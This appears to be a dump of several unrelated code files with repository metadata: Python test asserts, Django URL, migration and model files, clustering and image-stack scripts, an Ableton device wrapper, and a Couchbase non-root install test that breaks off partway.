resInfo_11_07 = res_resultDict_2019_11['result']['list'][6]
resInfo_11_08 = res_resultDict_2019_11['result']['list'][7]
resInfo_11_09 = res_resultDict_2019_11['result']['list'][8]
resInfo_11_10 = res_resultDict_2019_11['result']['list'][9]
resInfo_11_11 = res_resultDict_2019_11['result']['list'][10]
resInfo_11_12 = res_resultDict_2019_11['result']['list'][11]
resInfo_11_13 = res_resultDict_2019_11['result']['list'][12]
resInfo_11_14 = res_resultDict_2019_11['result']['list'][13]
resInfo_11_15 = res_resultDict_2019_11['result']['list'][14]
resInfo_11_16 = res_resultDict_2019_11['result']['list'][15]
resInfo_11_17 = res_resultDict_2019_11['result']['list'][16]
resInfo_11_18 = res_resultDict_2019_11['result']['list'][17]
resInfo_11_19 = res_resultDict_2019_11['result']['list'][18]
resInfo_11_20 = res_resultDict_2019_11['result']['list'][19]
resInfo_11_21 = res_resultDict_2019_11['result']['list'][20]
resInfo_11_22 = res_resultDict_2019_11['result']['list'][21]
resInfo_11_23 = res_resultDict_2019_11['result']['list'][22]
resInfo_11_24 = res_resultDict_2019_11['result']['list'][23]
resInfo_11_25 = res_resultDict_2019_11['result']['list'][24]
resInfo_11_26 = res_resultDict_2019_11['result']['list'][25]
resInfo_11_27 = res_resultDict_2019_11['result']['list'][26]
resInfo_11_28 = res_resultDict_2019_11['result']['list'][27]
resInfo_11_29 = res_resultDict_2019_11['result']['list'][28]
resInfo_11_30 = res_resultDict_2019_11['result']['list'][29]
assert ass.assert_in_text(resInfo_11_01, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_07, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_08, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_12, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_15, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_17, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_18, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_21, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_22, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_25, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_29, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_12 = json.loads(res_resultText_2019_12)
resInfo_12_01 = res_resultDict_2019_12['result']['list'][0]
resInfo_12_02 = res_resultDict_2019_12['result']['list'][1]
resInfo_12_03 = res_resultDict_2019_12['result']['list'][2]
resInfo_12_04 = res_resultDict_2019_12['result']['list'][3]
resInfo_12_05 = res_resultDict_2019_12['result']['list'][4]
resInfo_12_06 = res_resultDict_2019_12['result']['list'][5]
resInfo_12_07 = res_resultDict_2019_12['result']['list'][6]
resInfo_12_08 = res_resultDict_2019_12['result']['list'][7]
resInfo_12_09 = res_resultDict_2019_12['result']['list'][8]
resInfo_12_10 = res_resultDict_2019_12['result']['list'][9]
resInfo_12_11 = res_resultDict_2019_12['result']['list'][10]
resInfo_12_12 = res_resultDict_2019_12['result']['list'][11]
resInfo_12_13 = res_resultDict_2019_12['result']['list'][12]
resInfo_12_14 = res_resultDict_2019_12['result']['list'][13]
resInfo_12_15 = res_resultDict_2019_12['result']['list'][14]
resInfo_12_16 = res_resultDict_2019_12['result']['list'][15]
resInfo_12_17 = res_resultDict_2019_12['result']['list'][16]
resInfo_12_18 = res_resultDict_2019_12['result']['list'][17]
resInfo_12_19 = res_resultDict_2019_12['result']['list'][18]
resInfo_12_20 = res_resultDict_2019_12['result']['list'][19]
resInfo_12_21 = res_resultDict_2019_12['result']['list'][20]
resInfo_12_22 = res_resultDict_2019_12['result']['list'][21]
resInfo_12_23 = res_resultDict_2019_12['result']['list'][22]
resInfo_12_24 = res_resultDict_2019_12['result']['list'][23]
resInfo_12_25 = res_resultDict_2019_12['result']['list'][24]
resInfo_12_26 = res_resultDict_2019_12['result']['list'][25]
resInfo_12_27 = res_resultDict_2019_12['result']['list'][26]
assert ass.assert_in_text(resInfo_12_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_03, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_10, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_11, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_13, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_16, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_17, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_19, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_20, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_23, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_24, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_26, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_12_27, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
if __name__ == '__main__':
a = Attendance_analyse_late_02()
a.test_late_02()
| [
"1065913054@qq.com"
] | 1065913054@qq.com |
be8cefb2b3391ff0cda8c4d056368c0dead896e7 | 91e782eeb433a22f661d1e50a191a36b0e16b289 | /root/urls.py | dc080d62524d0e06c2d6af0f5f090b7ca1d27cd9 | [] | no_license | yramanii/budget | 5d6f8e43c6492595c79b1d4e33833393e17f0bcd | 533728c69058433405892254f74c68db03069c36 | refs/heads/main | 2023-07-09T10:13:07.947423 | 2021-08-20T07:27:13 | 2021-08-20T07:27:13 | 398,193,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | """root URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('app.urls'))
]
| [
"ramaniyash19@gmail.com"
] | ramaniyash19@gmail.com |
b2c50001eb73bf92411cc92db6f9729ad10ce817 | ed04425041ff7c18eb60d27dda5353ba3b65974b | /src/agglomerative.py | 588a82fd1a0ab38da127f7c54fbabdb3ff55eca6 | [] | no_license | alexmi256/colordiff | 36e927b5acb72f61bc50a17cbfed4221e42c8e61 | db91e0a10a0d8b1d1e3f734ca4c67635344f2b55 | refs/heads/main | 2023-03-15T09:32:23.209377 | 2021-03-08T02:19:47 | 2021-03-08T02:19:47 | 345,106,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | # TODO: Look into https://baoilleach.blogspot.com/2014/01/convert-distance-matrix-to-2d.html
# https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html#sklearn.cluster.AgglomerativeClustering
# https://www.datatechnotes.com/2019/10/agglomerative-clustering-example-in.html
from sklearn.cluster import AgglomerativeClustering
from src.example import make_matrix, print_clusters
# Try out AgglomerativeClustering
colors, distance_matrix = make_matrix()
aggloclust = AgglomerativeClustering(
n_clusters=None, affinity="precomputed", linkage="average", distance_threshold=28
).fit(distance_matrix)
labels = aggloclust.labels_
if -1 in labels:
print("There were no clusters found")
else:
print_clusters(colors, labels, distance_matrix)
| [
"alexmi3.14@gmail.com"
] | alexmi3.14@gmail.com |
3278d42f28e4adebbe01bf582c688739941488df | 8e95e79840005f6c34dfb978e8fe6e0ec4f7f643 | /9_Introduction to PySpark_/33_Test vs Train.py | 658938186f8e89f8ce821abc3d047cec0a15515f | [] | no_license | Naysla/Machine_Learning | a0593cac41ef1561f14bec55780570b82fc37720 | e75d5cd2894ccb005228ab3da87dde9025385a08 | refs/heads/master | 2023-02-01T17:19:32.413609 | 2020-12-22T20:36:45 | 2020-12-22T20:36:45 | 323,708,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | #Test vs Train
#After you've cleaned your data and gotten it ready for modeling, one of the most important steps is to split the data into a test set and a train set. After that, don't touch your test data until you think you have a good model! As you're building models and forming hypotheses, you can test them on your training data to get an idea of their performance.
#
#Once you've got your favorite model, you can see how well it predicts the new data in your test set. This never-before-seen data will give you a much more realistic idea of your model's performance in the real world when you're trying to predict or classify new data.
#
#In Spark it's important to make sure you split the data after all the transformations. This is because operations like StringIndexer don't always produce the same index even when given the same list of strings.
#
#Why is it important to use a test set in model evaluation?
By evaluating your model with a test set you can get a good idea of performance on new data.
#Exactly! A test set approximates the 'real world error' of your model.
| [
"60472499+Naysla@users.noreply.github.com"
] | 60472499+Naysla@users.noreply.github.com |
92694715d35c931f58ea9fdacff0c277bec3d3a8 | 5ffed81ced523b6e417b4e48d20380b6f16f8f42 | /exam/football_souvenirs.py | 867e2341fa443122f3abe1f9ea0b7f84ec5776db | [] | no_license | Nikoletazl/Basics-Python | 0f3f095bd51f9546c681e3cdd268232de88749ab | 17aef1b95814f13a02053681aae3e617e56f2fe6 | refs/heads/main | 2023-08-14T15:48:48.450249 | 2021-10-08T15:02:35 | 2021-10-08T15:02:35 | 415,027,622 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,959 | py | team = input()
souvenirs = input()
count_souvenirs = int(input())
if souvenirs == "flags":
if team == "Argentina":
price = count_souvenirs * 3.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 4.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 2.75
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 3.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "caps":
if team == "Argentina":
price = count_souvenirs * 7.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 8.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 6.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 6.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "posters":
if team == "Argentina":
price = count_souvenirs * 5.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 5.35
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 4.95
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 4.80
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "stickers":
if team == "Argentina":
price = count_souvenirs * 1.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 1.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 1.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 0.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
else:
print("Invalid stock!")
| [
"noreply@github.com"
] | Nikoletazl.noreply@github.com |
57ec67cddca13e7cf0f7dd96aedbda84abd79280 | fd8427d85222f7f24ae7b45b444ff4d3e910a3f7 | /posts/migrations/0002_auto_20200702_1317.py | 21f99f64fa8cd0aa9c129ff415e844ebfb8c2eea | [] | no_license | angeljerry0047/Omokaa-Vue | 8e49939364f6cb945e88ef1a0493881038004798 | 2642c3cddb118d52931673873d2160f028ee9e41 | refs/heads/main | 2023-08-19T08:17:59.646215 | 2021-10-05T08:33:54 | 2021-10-05T08:33:54 | 413,730,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | # Generated by Django 3.0.7 on 2020-07-02 12:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('posts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Type',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='SubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.Category')),
],
),
migrations.AddField(
model_name='category',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.Type'),
),
migrations.AlterField(
model_name='post',
name='category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.Category'),
),
migrations.AlterField(
model_name='post',
name='currency',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.Currency'),
),
migrations.AlterField(
model_name='post',
name='sub_category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.SubCategory'),
),
migrations.AlterField(
model_name='post',
name='type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='posts.Type'),
),
]
| [
"angeljerry0047@gmail.com"
] | angeljerry0047@gmail.com |
d8f1d4ac2ceb6dc54d7fafde61e9fa148276d68c | b7ce70c67689cc6f9d0a8bcf4b7a33468c865f69 | /4d_stack_avg.py | 109e5ce0b67d4e6686102fab745a1907ab78af05 | [] | no_license | tbutyl/OCT-flat | 10ac3cfe1c2de521f80ffb5300f4944f14bb1a59 | d80874185348e00b9bf9f360ed3e0572a8ca2780 | refs/heads/master | 2020-11-26T02:06:14.598059 | 2019-12-20T23:18:51 | 2019-12-20T23:18:51 | 228,932,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 15:02:27 2019
@author: Lab
"""
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 13:37:54 2019
@author: ebm
"""
from tkinter.filedialog import askdirectory
from skimage import io as io
import sys
from pathlib import Path
def sort_key(pth):
return int(pth.stem[9:])
def avg(pth):
save_pth = pth/'4d_avg_stack'
save_pth.mkdir()
files = sorted(list(pth.glob('*.tif')), key=sort_key)
#ASSUMING 32 VOLUMES CAPTURED PER FLASH
divisor = len(files)/32
try:
#to make sure that the divisor is a multiple of 32
assert divisor/int(divisor)==1
divisor = int(divisor)
except AssertionError:
sys.exit('The number of stacks was not a multiple of 32.')
for i,file in enumerate(files):
print(file)
stk = io.imread(str(file))
if i==0:
avg_stack = np.empty((32,stk.shape[0],stk.shape[1], stk.shape[2]))
if i < 32:
avg_stack[i, :, :, :] = stk/divisor
else:
avg_stack[i%32,:,:,:]+=stk/divisor
io.imsave(fname=str(save_pth/'avg_timeseries_stack.tif'), arr=avg_stack.astype('float32'))
def main():
source = askdirectory()
if source == '':
sys.exit("\n\nExited: No file path selected\n\n")
#sorting(Path(os.path.abspath(source)))
avg(Path(source))
print('done')
if __name__ == '__main__':
main()
| [
"ebmiller@ucdavis.edu"
] | ebmiller@ucdavis.edu |
132631fbc191c0d961db1e6783c48e19d8e8fd46 | 72d7cfbdd02f77300edb0f5e4104a1a147048ade | /djangoproject/myproject/users/migrations/0001_initial.py | e5e66726f68bb3366e771d7f04511d21d385f875 | [] | no_license | simrangrover5/batch430 | 33f3e59b7d2c70f87d796cc869855975ffef976a | ec841051d3a84cd56515aeff3b9d328cebea3705 | refs/heads/master | 2020-12-18T09:21:12.518412 | 2020-02-11T12:40:48 | 2020-02-11T12:40:48 | 235,325,192 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | # Generated by Django 3.0.1 on 2020-01-27 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adduser',
fields=[
('username', models.CharField(max_length=100, unique=True)),
('email', models.EmailField(max_length=100, primary_key=True, serialize=False)),
('password', models.CharField(max_length=100)),
('pic', models.ImageField(upload_to='')),
],
),
]
| [
"simrangrover5@gmail.com"
] | simrangrover5@gmail.com |
2be0ba7e8e25cc9d0b1e6cafbae03fd237e93a71 | dff26bd25d5189d9d44b2eb0fbb706fe6f39efab | /src/devices/audiofx/GrainDelay.py | 500239f87f062437e127b76ac670a33666f80049 | [] | no_license | princeofdarkness76/livemodel | e9e3ee6841ceb1b315ae43d635dab89ef2685692 | 70ea7f5fdf1bc0baa2e4a4bee48e115f23a1c3ea | refs/heads/master | 2018-01-10T20:02:41.003626 | 2016-01-12T18:40:59 | 2016-01-12T18:40:59 | 48,947,331 | 0 | 0 | null | 2016-01-12T18:34:21 | 2016-01-03T13:50:31 | Python | UTF-8 | Python | false | false | 2,382 | py | from LiveModel import DeviceBase
class GrainDelay(DeviceBase):
def __init__(self,device):
DeviceBase.__init__(self, device)
def getDeviceOn(self):
return self.params[0].value
def setDeviceOn(self,value):
self.params[0].value = value
deviceOn = property(getDeviceOn,setDeviceOn, doc='0 : Device On (0.0,1.0:Q)')
def getSpray(self):
return self.params[1].value
def setSpray(self,value):
self.params[1].value = value
spray = property(getSpray,setSpray, doc='1 : Spray (0.0,1.0)')
def getFrequency(self):
return self.params[2].value
def setFrequency(self,value):
self.params[2].value = value
frequency = property(getFrequency,setFrequency, doc='2 : Frequency (0.0,1.0)')
def getPitch(self):
return self.params[3].value
def setPitch(self,value):
self.params[3].value = value
pitch = property(getPitch,setPitch, doc='3 : Pitch (-36.0,12.0)')
def getRandom(self):
return self.params[4].value
def setRandom(self,value):
self.params[4].value = value
random = property(getRandom,setRandom, doc='4 : Random (0.0,1.0)')
def getFeedback(self):
return self.params[5].value
def setFeedback(self,value):
self.params[5].value = value
feedback = property(getFeedback,setFeedback, doc='5 : Feedback (0.0,0.949999988079)')
def getDrywet(self):
return self.params[6].value
def setDrywet(self,value):
self.params[6].value = value
drywet = property(getDrywet,setDrywet, doc='6 : DryWet (0.0,1.0)')
def getDelayMode(self):
return self.params[7].value
def setDelayMode(self,value):
self.params[7].value = value
delayMode = property(getDelayMode,setDelayMode, doc='7 : Delay Mode (0.0,1.0:Q)')
def getBeatDelay(self):
return self.params[8].value
def setBeatDelay(self,value):
self.params[8].value = value
beatDelay = property(getBeatDelay,setBeatDelay, doc='8 : Beat Delay (0.0,7.0:Q)')
def getBeatSwing(self):
return self.params[9].value
def setBeatSwing(self,value):
self.params[9].value = value
beatSwing = property(getBeatSwing,setBeatSwing, doc='9 : Beat Swing (-0.333000004292,0.333000004292)')
def getTimeDelay(self):
return self.params[10].value
def setTimeDelay(self,value):
self.params[10].value = value
timeDelay = property(getTimeDelay,setTimeDelay, doc='10 : Time Delay (1.0,128.0)')
| [
"marvotron@9d930748-7432-0410-9fcd-0fd381c6708b"
] | marvotron@9d930748-7432-0410-9fcd-0fd381c6708b |
80692a28f2335a303fd0ecefb7fd30fd697fdb1d | 2ba4c331a72ad89251ab4db9f404d7698b777d37 | /adhoc/models.py | ba16bef4ad425a382d55a6617de8c5e9af16912a | [] | no_license | hivefans/AnsiblePower | fd55121b8477092ff4ad830df44fd44f2e913666 | ad0c2b67f0c8cd9e7e0a2c6220277d2849965f7c | refs/heads/master | 2021-01-19T00:31:38.007147 | 2016-02-19T10:02:16 | 2016-02-19T10:02:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,675 | py | from __future__ import unicode_literals
from django.db import models
from ansible_auth.models import AuthUser
# Create your models here.
class AnsibleAdhoc(models.Model):
adhoc_name = models.CharField(max_length=45, blank=True, null=True)
adhoc_pattern = models.CharField(max_length=200, blank=True, null=True)
adhoc_args = models.CharField(max_length=200, blank=True, null=True)
start_time = models.DateTimeField(blank=True, null=True)
end_time = models.DateTimeField(blank=True, null=True)
finish = models.IntegerField(blank=True, null=True)
ansible_module = models.ForeignKey('AnsibleModule', models.DO_NOTHING)
auth_user = models.ForeignKey(AuthUser, models.DO_NOTHING)
class Meta:
db_table = 'ansible_adhoc'
ordering = ['-start_time']
class AnsibleAdhocTask(models.Model):
task_host = models.CharField(max_length=45, blank=True, null=True)
start_time = models.DateTimeField(blank=True, null=True)
end_time = models.DateTimeField(blank=True, null=True)
finish = models.BooleanField(default=False)
failure = models.BooleanField(default=False)
stdout = models.TextField(blank=True, null=True)
stderr = models.TextField(blank=True, null=True)
ansible_adhoc = models.ForeignKey(AnsibleAdhoc, models.DO_NOTHING)
class Meta:
db_table = 'ansible_adhoc_task'
unique_together = (('id', 'ansible_adhoc'),)
class AnsibleModule(models.Model):
module_name = models.CharField(unique=True, max_length=45)
module_describe = models.CharField(max_length=45, blank=True, null=True)
class Meta:
db_table = 'ansible_module'
ordering = ['module_name']
| [
"taoprogramer@gmail.com"
] | taoprogramer@gmail.com |
8c7cf55fc4fd423075f5f80507529ff6a80b8058 | e4b54361fe88d25c051e88b65a7c380145358610 | /pytests/nonroottests.py | 5834d2de8613fde36f40f1e56306b3ddf0b5d335 | [] | no_license | saigon/testrunner | 2c7c635271de56323b433e145b2bb10fa30d40b7 | 382ea1c84217ab58fb71f239801c1f2ee13923e0 | refs/heads/master | 2021-01-15T21:25:48.532023 | 2013-08-17T00:32:46 | 2013-08-17T00:41:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,204 | py | import logger
import unittest
import copy
import datetime
import time
import paramiko
import os
from couchbase.cluster import Cluster
from TestInput import TestInputSingleton
from membase.api.rest_client import RestConnection, Bucket
from couchbase.documentgenerator import BlobGenerator, DocumentGenerator
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
class NonRootTests(unittest.TestCase):
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self._os = self.input.param("os","null"); #Allow centos, ubuntu, windows
self.num_items = self.input.param("items", 100000)
self.servers = self.input.servers
self.master = self.servers[0]
self.clean_up()
self.log.info("Begin setting up the couchbase on all server nodes...")
self.non_root_install()
self.log.info("Wait for 30 seconds after couchbase install over all servers...")
time.sleep(30)
self.log.info("============== NonRootTests setUp was started ==============")
def tearDown(self):
"""
Delete the non-root installation
"""
self.log.info("============== NonRootTests tearDown was started ==============")
for server in self.servers:
shell = RemoteMachineShellConnection(server)
if self._os == "centos" or self._os == "ubuntu":
command = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command("rm -rf etc/ opt/ couchbase-server-enterprise_x86_64_2.2.0-772-rel.*")
shell.log_command_output(o, e)
else:
#Handling Windows?
pass
shell.disconnect()
def clean_up(self):
self.log.info("Cleaning up nodes, stopping previous couchbase instances if any ..")
for server in self.servers:
shell = RemoteMachineShellConnection(server)
if self._os == "centos" or self._os == "ubuntu":
command = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command("rm -rf etc/ opt/ couchbase-server-enterprise_x86_64_2.2.0-772-rel.*")
shell.log_command_output(o, e)
command = "rm -rf backup/"
shell.log_command_output(o, e)
else:
#Handling Windows?
pass
shell.disconnect()
"""
Method that sets up couchbase-server on the server list, without root privileges.
"""
def non_root_install(self):
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for server in self.servers:
shell = RemoteMachineShellConnection(server)
info = shell.extract_remote_info()
ssh_client.connect(hostname=server.ip,key_filename=server.ssh_key)
sftp_client = ssh_client.open_sftp()
if self._os == "centos":
command0 = "rm -rf opt/ etc/ && rm -rf couchbase-server-enterprise_x86_64_2.2.0-772-rel.rpm"
command1 = "wget http://builds.hq.northscale.net/latestbuilds/couchbase-server-enterprise_x86_64_2.2.0-772-rel.rpm"
command2 = "rpm2cpio couchbase-server-enterprise_x86_64_2.2.0-772-rel.rpm | cpio --extract --make-directories --no-absolute-filenames"
command3 = "cd /home/{0}/opt/couchbase && ./bin/install/reloc.sh `pwd`".format(server.ssh_username)
command4 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -- -noinput -detached".format(server.ssh_username)
command5 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command0)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command1)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command2)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command3)
shell.log_command_output(o, e)
self.log.info("Starting couchbase server <non-root, non-sudo> ..")
o, e = shell.execute_non_sudo_command(command4)
shell.log_command_output(o, e)
elif self._os == "ubuntu":
command0 = "rm -rf opt/ etc/ && rm -rf couchbase-server-enterprise_x86_64_2.2.0-772-rel.deb"
command1 = "wget http://builds.hq.northscale.net/latestbuilds/couchbase-server-enterprise_x86_64_2.2.0-772-rel.deb"
